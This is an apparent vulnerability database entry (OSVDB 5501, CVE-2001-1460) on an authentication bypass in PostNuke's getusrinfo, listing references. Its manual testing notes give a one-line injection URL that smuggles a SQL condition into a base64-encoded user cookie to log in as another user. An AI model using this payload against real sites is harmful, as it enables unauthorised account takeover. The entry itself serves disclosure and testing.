PostNuke getusrinfo Authentication Bypass

2001-10-12T00:00:00
ID OSVDB:5501
Type osvdb
Reporter OSVDB
Modified 2001-10-12T00:00:00

Description

Technical Description

This issue appears to have been discovered twice, and never patched correctly.

Manual Testing Notes

http://[victim]/article.php?save=1&sid=20&[ANY SID]cookieusrtime=160000& user=USERID:USERNAME:' or uname='USERNAME [base64_encoded]

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-10/0088.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-03/0199.html ISS X-Force ID: 8481 ISS X-Force ID: 7280 CVE-2001-1460 CERT VU: 921547 Bugtraq ID: 3435 Bugtraq ID: 4302